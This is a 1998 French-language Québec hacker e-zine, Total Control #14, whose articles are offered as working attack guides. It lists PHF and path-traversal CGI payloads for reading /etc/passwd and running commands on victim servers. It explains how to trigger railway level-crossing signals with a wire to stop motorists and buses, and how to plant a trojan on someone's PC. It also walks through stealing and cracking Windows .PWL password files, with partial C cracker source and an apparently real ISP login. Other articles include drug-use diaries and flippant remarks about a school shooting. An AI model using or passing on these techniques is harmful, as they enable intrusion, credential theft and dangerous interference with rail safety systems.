
================================> NUMRO 14 <=================================


        _____________     _____________              ____
        \____    ____\    \____    ____\             \   \
             \   \    ______   \   \     ________     \   \
              \   \   \  __ \   \   \    \   __  \     \   \
               \___\   \ \_\ \   \___\    \  \_\  \     \   \
                        \_____\            \   __  \     \   \
                                            \__\ \__\     \   \
                                                           \   \__________
                                                            \_____________\
      
     /~~\  ______     _____   ___ _____________                   __
    / /~~  \  __ \    |   ø\  | | \____    ____\                 |  |
    \ \__.  \ \_\ \   | /\  \_/ |      \   \    |~~~~ø\   _____  |  |
     \___|   \_____\  |_| |_____|       \   \   |  ø  /  | ___ | |  |
                                         \___\  | |~\ |  | |_| | |  |_____
                                                |_|  \_\ |_____| |_______|



================================> NUMRO 14 <=================================


*----------------------------------------------------------------------------*
İ                                                                            İ
İ                    Total Control,  Num‚ro 14,  Juin 1998                   İ
İ                                                                            İ
İ                       http://totalcontrol.home.ml.org                      İ
İ                                                                            İ
*----------------------------------------------------------------------------*
İ#tctrl (EFNET) = LE CHANNEL OFFICIEL DES LECTEURS ET STAFFS DE TOTAL CONTROLİ
*----------------------------------------------------------------------------*

/------------------\
|  AVERTISSEMENT   |
\------------------/

Ce document  contient  des  informations  ill‚gales si  vous les utilisez mais
puisque,  ici,  elles  ne  sont  distribu‚es  que pour  des  fins  ‚ducatives,
elles peuvent ˆtre  consid‚r‚es ‚tant l‚gales (vous me suivez ?). Le personnel
de Total Control ne vous encourage  pas … utiliser ces techniques et n'est pas
responsable de l'utilisation que vous en faites. Bla bla bla...

/------------------\
|   Mode d'emploi  |
\------------------/

Pour tous les fuckin' perdus de la vie qui ne savent pas trop pourquoi ce zine
est truff‚ de "carr‚s noirs" … la place des accents (ce qui le rend illisible)
et pourquoi il est tout croche, VOUS DEVEZ LE LIRE AVEC MS-EDIT EN DOS !!!

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                               0=--------------=0
                               |  Introduction  |
                               0=--------------=0
                      Par Err418 (err418@technologist.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

        Salut tout le monde... une fois de plus, l'‚quipe de TC magazine vous
a pondu un bon p'tit zine comme on les aime. Bien s–r, nous discuterons de
diff‚rents sujets tels que les tracks de chemin de fer du CN, la p‚n‚tration
des disques durs, les .pwl, ect... Comme vous pouvez le constater, beaucoup
d'articles de ce num‚ro 14 sont des s‚quels d'articles que l'on retrouvait
dans le num‚ro 13. Il faut croire que le #13 a donn‚ le go–t … plusieurs de
se mettre … l'oeuvre :-)

        J'ai une couple de petites news pour vous autres... PremiŠrement, vous
avez s–rement entendu parler de cette autre fusillade dans un ‚cole aux USA
(damn, they SUX)... Cette fois-ci, il s'agit d'un "high school" de la ville de
Springfield en Or‚gon. Un jeune homme, nomm‚ Kip Kinkel, est aller dans la
caf‚t‚ria de son ‚cole et … ouvert le feu sur ses copains. Personnellement,
je le trouves d‚bile mais j'ai quelques choses d'assez int‚ressant sur ce gars
l… : c'‚tait le gars qui s'occupait de PLA of OREGON. C'est marrant en crisse.
€a veut dire que vous avez peut-ˆtre d‚j… chatter avec ce d‚bile l… si vous
vous tenez sur le site et le channel de PLA.

        Bon ben, pour l'autre news, c'est un peu moins dr“le.. mais c'est tout
de mˆme int‚ressant... vous avez s–rement entendu parler des "trois cracks en
informatiques" qui se sont faits buster pour avoir diffuser des infos sur les
explosifs et tout.. et bien il s'agit de la gang de Corruption Addicts.

        Plus, pr‚cisement, il s'agit de PHAUST - NMARE et SLIVERTHORN. Voyez
joint … ce num‚ro de TC la front page du Journal de Qc ou PHAUST y est pos‚
est gros plan (free-ca.jpg). Le procŠs de d‚butera le 21 juillet 1998 …
9h00 AM (d'aprŠs Nmare). J'essayerai d'ˆtre sur place et mˆme qu'il est
possible que TC organise une manifestation @FREE SPEECH@. Sachez que le 2600
et the Blue Ribbon Organisation vont appuyer les membres de C-A dans leurs
d‚marches.

        Alors, c'est tout ce que y'avait comme news et maintenant voici notre
programme principal.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                          Le courrier des lecteurs
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Voici le courrier des fidŠles lecteurs...

---------------Cut Here---------------------
From: "GL[a]CiUs" <mrduff@videtron.ca>
To: <err418@technologist.com>
Subject: ToTaL CoNtRoL
Date: Thu, 28 May 1998 06:21:36 +0200

S'lut err418

Je t'‚cris juste pour t'encourager dans ce que tu fais , pis de continuer,
c'est tres interressant ton zine. Pis j'aimerais remercier une personne,
j'peux pas la nommer donc on j'l'appelle MrX . MrX (qui se reconnais c s–r)
je tiens … te remercier pour tout ce que tu fais pour moi, hacking, phreaking
, etc... C'est lui qui me montre tout, c'est la meilleure personne que je
connaisse en hacking, pis j'‚cris ce e-mail pour que cette personne le voie et
se propose a un poste dans ta revue en tant que r‚dacteur d'article de
hacking.

Err418, tu la connais peut-ˆtre, touka j'espŠre qu'il aura le gots de se
proposer. Pis j'aimerais souhaiter bonne chance a phaust et nightmare :~( .
J'suis d‚soler pour vous les mecs. Malgr‚ que je vais surement all‚ les
rejoindre un jour

Take care dude , fuck you all lamer , GL[a]CiUs de #Centre-ville (undernet)

R‚ponse :
---------
TC:     H‚h‚h‚, Glacius, je sais trŠs bien de qui tu parles... c'est vrai que
        c'est un gars de haut "calibre". En tout cas... j'espŠre qu'il est
        touch‚ par tes chaleureux remerciments.

---------------Cut Here---------------------

From: le_disciple@hotmail.com
To: err418@technologist.com
Subject: Total Control
Date: Tue, 02 Jun 1998 19:57:29 PDT

Salut! Je viens de me taper les 13 numeros de TC, et je dois te
feliciter: bon boulot! Je suis vraiment heureux qu'enfin un magazine 
quebecois apparaisse; je croyais etre le seul H/P au Quebec!

Incidemment, j'ai vu ta demande d'articles sur ta page Web, et je penses 
bien pouvoir en ecrire. A toi d'en juger: j'ai quelque chose comme 10 
ans d'experience dans le H/P (je suis pas un vieux sec, j'ai juste 
commence jeune...), je reste dans le 514, et j'ai plein d'idees. En 
plus, je suis en vacances jusqu'en septembre!

En tout cas, j'aime pas donner trop d'info par e-mail (securite nulle), 
mais si ca t'interesse, donnes-moi des nouvelles a cette adresse bidon; 
on pourra se donner rendez-vous sur IRC.

Le Disciple

R‚ponse :
---------
TC:     Super ta proposition... mais tu sais.. on aura la chance de se
        reparler sur le channel qu'on s'est vu l'autre jour :-)
        En passant, ne t'inquiŠte pas, tu n'est pas le seul hacker au Qu‚bec.

---------------Cut Here---------------------
From: phill@netlimit.com
To: <err418@technologist.com>
Subject: Question??
Date: Thu, 11 Jun 1998 16:23:14 -0400

Est-ce que vous avez un login et un pass pour le lien vers le site
"Pour les acheteur "registred" de Millenium" ??

Si oui, j'aimerais l'avoir !!

                                        Phill

R‚ponse :
---------
TC:     Ben tu sais phill on travaille l… dessus notre accŠs … cette partie du
        site... cependant, si j'en d‚croche un (access) je crois pas que je
        vais le donner … tout le monde... j'va aller checher ce que j'ai
        besoin avant tout.

---------------Cut Here---------------------
From: dgodro@total.net
To: err418@technologist.com
Subject: a propos de tctrl....
Date: Fri, 12 Jun 1998 17:37:59 -0700

Salut Err418,
Je t'‚crit car t'avait l'air de croire que personne lisait ton e-mags. Ben
moi j'trouve ca d'valeur que tu pense ca (en tk c'est ce que ta dit dans le
numero 4 ou 5) parce que ton emags y'est super cool en plus c'est en francais
et faite par un quebecois pis j'ai ben aimer le truc de harceler qqun avec
les petites annonces pis toute le kit. En tk jtrouve que toi et ton equipe
vous faite une ben bonne job.

                        Un lecteur de tctrl,
                        Bistro 

R‚ponse :
---------
TC:     Merci de ton encouragements... Tu sais.. les #4 et #5 sont assez
        vieux.. maintenant, nous sommes conscient que TC magazine est
        assez lu puisque nous avons plus de 20 hits/jour sur le site.

        Merci, See ya ! err418

---------------Cut Here---------------------

        That's all folks.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                                Les Bugs CGI
                      Par Err418 (err418@technologist.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Avertissement : Certaines lignes de cet article peuvent d‚bord‚es du cadre de
=============   lecture puisqu'il sagit de longues commandes qui s'‚crivent
                sur une seule ligne. J'ai gard‚ la longueur originale pour
                une meilleure compr‚hension. Merci de votre compr‚hension.

Pour certains, le plus dur dans le hacking c'est de r‚cup‚rer la passwd file.
Alors, voici pour vous diff‚rents bugs CGI qui vous permettront d'acc‚der … la
passwd file et … d'autres fonctions du OS.

PremiŠrement, voici le INFAMOUS bug PHF que presque tout le monde connait :

http://www.victime.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

Bien s–r ce bug est vieux et il n'est pas trŠs trŠs efficace puisqu'il est
patch‚ sur presque tout les serveurs. Je vous conseille de tester les vieux
.edu perdus.. quelques fois vous tomberez sur le gros lot.

Voici maintenant, d'autres bugs CGI qui sont un peu moins connus que vous
devriez essayer lors d'une tentative de r‚cup‚ration de passwd file...

/cgi-bin/htmlscript?../../../../../etc/passwd
/cgi-bin/php.cgi?/etc/passwd
/cgi-bin/phftemp?Qalias=x%0a/bin/cat%20/etc/passwd 
/cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd
/cgi-bin/phf?Qalias=3Dx%0a/bin/cat%20/etc/passwd%0Apwd%0Aid% 
/usage/mnth9.html/cgi-bin/phf?Jserver=foobar.com%0Acat%20/etc/passwd%0A&Qalias=&
/cgi-bin/wais.pl/set%20Gopher=/bin/cat%20/etc/passwd
/cgi-bin/fi?/etc/passwd
/cgi-bin/webdist.cgi?/bin/mail%20:/etc/passwd[me@myhost.com]
/cgi-bin/view-source?../../../../../../../etc/passwd

Les 2 prochains qui suivent sont des commandes en protocole HTTP que vous
devez tapp‚ en vous connectant sur le port 80 avec un client telnet. En fin
de compte, vous simulerez des commandes que le browser web envoye au serveur
habituellement...

GET
/cgi-bin/phf?Jserver=foobar.com%0Acat%20/etc/passwd%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip=
                                                                                                                                                                  
GET
/cgi-bin/phf?Jserver=foobar.com%FFcat%20/etc/passwd%FF&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip=
                                                                                                                                                                  
GET /cgi-bin/php.cgi?/etc/passwd

Voici un autre petit bug CGI qui lui permet d'obtenir un listing des fichiers
d'un r‚pertoire... (pas trŠs utile mais amusant)

/cgi-bin/wrap?/../../../../../etc

Pour conclure, j'aimerais vous inviter … inventer vous mˆme diff‚rentes
commandes... voici des exemples que j'ai inventer … partir du bug PHF :

/cgi-bin/phf?Qalias=x%0a/bin/ls%20-l%20/   ------------\
                                                        |
Changer le / de la fin par n'importe quel r‚pertoire  <-|

/cgi-bin/phf?Qalias=x%0aid

/cgi-bin/phf?Qalias=x%0auname%20-a

/cgi-bin/phf?Qalias=x%0awhoami

etc... les possibilit‚s sont infinies.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
         Comment faire d‚clancher les passages … niveaux. M‚thode II
                        Cluster (cluster@comports.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

J'ai  d‚couvert  un moyen  extrˆmement  simple  pour d‚clancher  les passage …
niveau du CN.

Matos:

1 Fil ‚lectrive d'environ 2 mŠtres (ou n'importe quelle cossin conducteur)
1 du tape [‚lectrique] (si c'est un fil souple)

PremiŠrement tu tape un bout du  fil (d‚nud‚ bien sur) sur une rail. S'assurer
qu'il sois bien en  contact avec la rail. (si c'est metton  c'est une barre de
fer  ben  ta  juste  …  la  mettre  en  travers de la track  mais ce N'EST PAS
RECOMMAND). Si  tu as peur de te faire pogner  proche de la rue, ben ta juste
… aller  plus loin (-+ 100m); tu peux  te rendre  jusqu'…  l'autre boite grise
(la plus petite). Pour  savoir  si  les 2 rails  peuvent ˆtre  branch‚es entre
elles ta juste … checker … la  jonction de 2 rails, si il y a un espŠce de fil
du  genre  cable  d'acier sa veut dire que tu peux encore  brancher  ton  fil.

DeuxiŠmement tu sacres l'autre bout du fil sur la rail oppos‚.

Patienter quelques secondes (+- 5 secs)

La tu d‚crisses si tu veux pas te faire pogner parce que sa va sonner!

Choses utiles … faire avec sa:

Tu peux te  prendre un peu plus long  de fil et le cacher  entre les rails, tu
mets le contact et tu le laisse pour ‚nerver tes voisins.

Tu  surveilles  si  un  automobiliste (ou un trucker) arrive pis  tu  mets  le
contact. Avec les autobus c'est encore plus crampant parce qu'ils sont supos‚s
ˆtre OBLIGER d'attendre que la lumiŠre sois ‚teinte. HAHaaHhaAHAH

Si vous avez d'autres bonne id‚es envoyer moi ‡a: cluster@comports.com. Est-ce
que  quelqu'un pourrait  essayer sa sur un passage avec des barriŠres!? Je  ne
sais pas si sa marche (moi c'‚tait simplement avec des lumiŠre et une cloche).

-----------CUT HERE----------------
La Presse, dimanche 17 mai 1998

Un automobiliste a eu  la peur de sa vie dans la nuit de  vendredi … samedi,
lorsque  la  camionnette  qu'il  conduisait  a  ‚t‚ happ‚e par  un train, au
passage … niveau du boulevard  du S‚minaire, … Saint-Jean. Le v‚hicule a ‚t‚
train‚ sur une  distance de huit kilomŠtres, soit  jusqu'… un  croisement de
voie, o—  il a gliss‚ sur le cot‚ de la  voie. Fait encore  plus inusit‚, le
conducteur  de  la  locomotive  ne s'est  pas  aper‡u qu'il  avait heurt‚ un
v‚hicule. Ce  n'est qu'… Brossard que  le train a ‚t‚  immobolis‚ et que les
dommages on  ‚t‚ constat‚s sur la locomotive. Le chauffeur de la camionnette
a ‚t‚  transport‚ …  l'hopital de  Saint-Jean o—  il se trouve  dans un ‚tat
satisfaisant.  La  police ignore  les  circonstances  exactes de l'accident.
-----------CUT HERE----------------

Faites  attention  lorsque  vous  gossez avec les affaires  du CN et je vous
rappelle  que  Total  Control  n'est  aucunement responsable  de ce que vous
faisez avec les informations contenues dans ce magazine!

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
               Comment p‚n‚tr‚ un disque dur sans se casser la tˆte
                     Lord Nikon (nikonstock@hotmail.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

INTRODUCTION
============

Dans le fond tout le monde se dit que c'est difficile p‚n‚tr‚ un disque dur et
la pluspart des hackers vous propose des truc en Linux ou bien en windows mais
qui sont quand mˆme difficile a apprendre pour un newbie, ce ptit bout de
texte va vous expliqu‚ comment p‚n‚tr‚ le disque dur de kekun grace a son ip
et a l'aide de 2 petits programme.


CHOSE SRIEUSE
==============

C'est a partir d'ici que les choses s‚rieuse commence, vous devez downloader
pour commencer le premier programe (control.exe) celui la c'est votre client
et l'autre (host.exe) c'est votre serveur.

(Note de Err418 : ces deux fichiers sont joints … ce num‚ro)

En installant ce programe, vous accŠderez au disque dur de votre victime par
le port 5000 donc le programe host (host.exe) sert de serveur qui agit sur le
port 5000.

1: Le port 5000 ne peut recevoir qu'une connection a la fois donc ne pensez
pas a pirater 2 sur le mˆme ordinateur en mˆme temps.

2: Quand le client est activ‚, il peut servir de host en mˆme temps alors
attention il faut vous prot‚g‚, les meilleur protection que j'ai trouv‚
jusqu'… maintenant: Nuke Nabber (et oui ce petit programe anti-nuke a chier
est enfin utile a quelque chose) et il y a aussi Conseal PC Firewall.

En ouvrant le programe, il va vous demander un mot de passe, qui est:
666 C/S JCzic...
(Mettez les espace, les majuscule, le slash et les 3 ptit point sinon le
password marchera pas.)

DeuxiŠmement, je vais vous donner un bref mode d'emploi mais ‚tant donn‚ que
mˆme mon petit con de frŠre de 11 ans sait s'en servir seul alors il ne
devrais pas y avoir trop de problŠme.

1: Vous devez d'abord envoyer la file host.exe a kelkun sur le net, ensuite il
doit l'activer (l'ex‚cuter) et quand il va l'avoir activ‚, ca va dire :

"setup32.dll not found"

C'est parfait parce que ca veux dire que ca marche. · partir de ce moment,
vous pouvez entrer dans son ordi grƒce a son adresse ip (sur IRC faites
/dns ou sur icq dans info). Vous pouvez restarter son ordis, uploader des
virii et les ex‚cut‚ a distance sans aucun risque pour votre petite machine,
vous pouvez downloader tout ce dont vous d‚sir‚.

2: Allez voir la section Mirc, trŠs utile si vous voulez prendre le controle
d'un channel IRC et vous all‚ ˆtre le seul op, cool non !

EN RSUM :
HOST.EXE        -->     C'est le trojan horse
CONTROL.EXE     -->     C'est votre console de contr“le

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                                wEED girl
                     calimes (vampire_27@hotmail.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Bonjour … tous! H‚ oui, j'me suis enfin d‚cid‚ a ‚crire un foutu article pour
ce journal. €a fait un m‚chant bout que Err418 me pousse dans l'cul alors j'me
suis dit : "Calimes, tu vas t'moover !"

Soit dit en passant, moi j'vous parlerais pas de hacking ni de phreaking,
parce que j'y connais rien. Tout ce que je connais c'est ce qui est ‚crit dans
ce journal, mais pensez pas que j'aime pas ‡a l…!!! Au contraire, j'ai
tellement pass‚e d'heures buzz‚e avec Err418 devant un t‚l‚phone public que je
commence … y prendre go–t.

Et voil… justement le sujet principal de mes articles futurs [‡a reste … voir
:-) ] : le wEEd, les buzz trippants qu'on a eu moi et Err418
(ou d'autres personnes) et des sujets du genre...

Donc, si vous ˆtes contre l'utilisation des paradis artificiels, arrˆtez-vous
drette l…. Sinon, ce qui suit peut vous int‚resser (enfin, je l'espŠre) !!

Bon, comme moi et Err ont dit souvent : la vie c'est fait pour ˆtre v‚cu (pas
trŠs recherch‚, mais bon). J'en suis venu … une th‚orie qui me semble trŠs
plausible : Y'a du monde qui disent que fumer du pot c'est nul parce qu'on est
plus nous mˆme, parce qu'on s'en sert pour oublier nos problŠmes, etc.. etc...
Mais moi j'me dis : pourquoi arrˆter de faire quelque chose qui nous fait du
bien ?? Vraiment, j'vois pas... Merde, c'est vrai, si on en prend c'est que
‡a nous apporte quelque chose de plaisant, non ? Pourquoi refuser ce qui nous
fait du bien??? C'est s–r qu'il y a des limites … se faire plaisir mais
faudrait pas dramatiser quand mˆme !!!

Facque vive la libert‚ d'action !!!

12h30PM, moi et Err418, on d‚cide de s'rouler un top, question de passer au
travers de notre premiŠre journ‚e de vacances sans ennui.

12h45PM, on s'rend au lieu de notre principal fournisseur, L'ARCADE, ou tout
les petits pushers de la ville se battent pour vendre leur stock. On d‚cide
de jouer une p'tite game de Tetris (jeu qui met en valeur le quotient
intellectuel) question de montrer que y'a pas juste le wEED qui nous
int‚resse... mais en r‚alit‚, on en a rien … foutre de ce jeu qu'on a
chez-nous sur l'ordi... tout ce qu'on a en tˆte c'est notre wEED. De toute
fa‡on, fuck that, le "bouncer" de l'arcade (un p'tit don juan maigre et
croyant avoir de l'autorit‚ sur nous) nous dit de foutre le camp si on d‚pense
pas au moins 1$ dans ses machines... y'en veut pas d'notre cash, tant pis pour
lui, on s'en va !!

1h00PM, le monde est tellement habitu‚ de nous voir venir chercher d'la poffe
que tout le monde vient nous demander si on veut du pot... c'Est cool, mˆme
pas besoin de courir aprŠs.

1h15PM, on se rend … un endroit cool ou on aime bien tirer des joints : un mur
de b‚ton haut de 9 pieds qui donne face … une rue ou y'a crissement pas
beaucoup de circulation. Malheureusement, vu que c'est prŠs d'un stationnement
pis que le surveillant (un encul‚ … mon avis) arrive, on se doit de quitter
la place... mais l…, c'est quoi qui arrive pas, on d‚cide de fumer en s'en
allant, mais cet "encul‚ de ma mŠre" nous suit! Faut tu pas ˆtre ‚coeurer !!
Finalement, aprŠs au moins 30 minutes de tettage, on finit par terminer ce bat
pis on est crissement partis.

1h45PM, on d‚cide d'entrer … l'‚cole pour s'acheter une Root Beer (c'est Err
qui boit ‡a, pas moi !) pis l… je pense … un m‚chant bon pacte que je pourrais
faire avec Err418. J'lui dis : "on pourrait d‚cider de fumer … des occasions
sp‚ciales, du style : la fin de l'ann‚e, les partys, quelqu'un c'est trouv‚
une job, des niaiseries du genre"... Il me dit : "ouin, c'est pas pire ‡a !"
Mais le HIC c'est qu'on a tellement souvent d'occasions de le faire qu'on va
pourvoir se dire qu'on moins on a une bonne raison de le faire !!!
(je sais pas si vous comprenez ?) C'est pas une bonne id‚e ‡a ?
(R‚ponse de Err418 : "Ben non pas vraiment !")

2h00PM, On est donc repartis l… dessus en se disant qu'on s'en crissait
vraiment qu'on ait une raison ou pas, mais j'‚tais ben contente d'avoir
penser … ‡a quand mˆme!

Ce serait ben l'fun que j'vous raconte le reste de notre journ‚e, mais vous
risquez de trouver ‡a assez ennuyeux... on s'est effoir‚ un peu partout pis on
a invent‚ un sc‚nario de film.. j'vous parlerai un autre jour du film
(si on d‚cide de le faire)

En tout cas, ‡a vraiment ‚t‚ une journ‚e cool!! Pis ‡a s'est termin‚ avec un
m‚chant gros trippe bouffe!! H‚H‚! Bye, j'vous dit l'bonjour !

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                           Comment cracker un .PWL
                      Par cluster (cluster@comports.com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

PremiŠrement  un .PWL c'est comme  le /etc/passwd d'une machine UNIX sauf pour
Windows. Sa  contient plusieurs login et passwd comme celui  de l'ouverture de
session  de  Windows et  celui pour  se  plugger … son ISP. Donc, vous  piquer
le  ou les  .PWL (c:\windows). Example  dans un  magasin ou  vous utiliser les
techniques que nous avons parler dans Total Control #14. AprŠs avoir piquer le
.PWL sur l'ordi de votre victime vous utiliser GLIDE pour le decrypter.

C:\>glide m0onbeam.pwl

Username: m0onbeam.pwl
Sizemask: 18DE
Analyzing block with size:0000	(0:1)
Analyzing block with size:0000	(1:0)
Analyzing block with size:0000	(2:0)
Analyzing block with size:0000	(3:0)
Analyzing block with size:0000	(4:0)
Analyzing block with size:0000	(5:0)
Analyzing block with size:0000	(6:0)
Analyzing block with size:0000	(7:0)
Analyzing block with size:0000	(8:0)
Analyzing block with size:0000	(9:0)
Analyzing block with size:002e	(10:1)
Analyzing block with size:0000	(11:0)
Analyzing block with size:0000	(12:0)
Analyzing block with size:0000	(13:0)
Analyzing block with size:0000	(14:0)
Analyzing block with size:0000	(15:0)
54 bytes of keystream recovered
Resource[0] (2)
Resource[1] (2)
Resource[2] (2)
Resource[3] (2)
Resource[4] (2)
Resource[5] (2)
Resource[6] (2)
Resource[7] (2)
Resource[8] (2)
Resource[9] (2)
Resource[10] (48)
.    *Rna\Microtec - Qu‚bec\etincellvio2770 <-- Nous pouvons d‚duire que
Resource[11] (2)                                   c'est un account PPP qui
Resource[12] (2)                                   utilise  le   dialup  de
Resource[13] (2)                                   Windows (RNA).
Resource[14] (2)
Resource[15] (2)

   *Rna\Microtec - Qu‚bec\etincellvio2770
                             ^^^^^^^^^^^^^^^
Ce sont le  login et le passwd de son account. Tout  ce que nous avons … faire
maintenant c'est de d‚terminer ou se s‚pare le login du passwd, pour cela nous
nous branchons sur le port 110 du  server de mail de Microtec. Dans ce cas ci:
microtec.net [204.50.80.57]. Si  ce n'est pas sur le server principal de l'ISP
c'est  souvent  mail.le_nom_du_fournisseur.com.  Pour  cette  partie  je  vous
conseil d'utiliser un firewall du style "Wingate" (24.226.3.4 est perm). C'est
beaucoup plus rapide  et s‚curitaire de tester les  combinaisons par le server
de mail que se brancher  chez microtec par dialup et essayer les combinaisons.

WinGate>microtec.net 110
Connecting to host microtec.net...Connected
+OK r2d2.microtec.net Cyrus POP3 v1.5.2 server ready
user etincell
+OK Name is a valid mailbox
pass vio2770
+OK Maildrop locked and ready

Bravo! C'est le bon login et passwd! Maintenant vous avez juste  … pogner le #
de  t‚l‚phone  pour  se  brancher  chez  Microtec  et Hop! un account gratos …
utiliser ou … trader.

Notes:

Les r‚ponses du server peuvent ˆtre diff‚rentes selon le type de deamon que le
fournisseur utilise.

Les .PWL de Win98 ne sont PAS compatible avec GLIDE.

OUI m0onbeam.pwl utiliser  dans cette article est vrai. Mais ne l'utiliser pas
parce que c'est ill‚gal d'utiliser cette account.

Voici les sources de GLIDE.C (Je ne sais pas qui est l'auteur)

------------------->8 CUT HERE 8<-------------------

#include <stdio.h>
#include <string.h>

unsigned char Data[100001];
unsigned char keystream[1001];
int Rpoint[300];

main (int argc,char *argv[]) {
       FILE *fd;
       int     i,j,k;
       int     size;
       char ch;
       char *name;
       int cracked;
       int sizemask;
       int maxr;
       int rsz;
       int pos;
       int Rall[300]; /* resource allocation table */


       if (argc<2) {
				printf("    GLiDE PWL CRACKER\n\n");
				printf("Licensed to Total Control\n\n");
	   			printf("usage: glide filename (username)");
				exit(1);
       }

       /* read PWL file */

       fd=fopen(argv[1],"rb");
       if(fd==NULL) {
               printf("can't open file %s",argv[2]);
               exit(1);
       }
       size=0;
       while(!feof(fd)) {
               Data[size++]=fgetc(fd);
       }
       size--;
       fclose(fd);

       /* find username */
       name=argv[1];
       if(argc>2) name=argv[2];
       printf("Username: %s\n",name);

       /* copy encrypted text into keystream */
       cracked=size-0x0208;
       if(cracked<0) cracked=0;
       if(cracked>1000) cracked=1000;
       memcpy(keystream,Data+0x208,cracked );

       /* generate 20 bytes of keystream */
       for(i=0;i<20;i++) {
               ch=toupper(name[i]);
               if(ch==0) break;
               if(ch=='.') break;
               keystream[i]^=ch;
       };
       cracked=20;


       /* find allocated resources */

       sizemask=keystream[0]+(keystream[1]<<8);
       printf("Sizemask: %04X\n",sizemask);

       for(i=0;i<256;i++) Rall[i]=0;

       maxr=0;
       for(i=0x108;i<0x208;i++) {
               if(Data[i]!=0xff) {
                       Rall[Data[i]]++;
                       if (Data[i]>maxr) maxr=Data[i];
               }
       }
       maxr=(((maxr/16)+1)*16);
       /* resource pointer table size appears to be ivisible by 16 */

       /* search after resources */

       Rpoint[0]=0x0208+2*maxr+20+2;   /* first resource */
       for(i=0;i<maxr;i++) {
               /* find size of current resource */
               pos=Rpoint[i];
               rsz=Data[pos]+(Data[pos+1]<<8);
               rsz^=sizemask;
               printf("Analyzing block with size:%04x\t(%d:%d)\n",rsz,i,Rall[i]);
               if( (Rall[i]==0) && (rsz!=0) ) {
                       printf("unused resource has nonzero size !!!\n");
                       exit(0);
               }

               pos+=rsz;

               /* Resources have a tendency to have the wrong size for some reason */
               /* check for correct size */

               if(i<maxr-1) {
                       while(Data[pos+3]!=keystream[1]) {
                               printf(":(%02x)",Data[pos+3]);
                               pos+=2; /* very rude may fail */
                       }
               }

               pos+=2; /* include pointer in size */
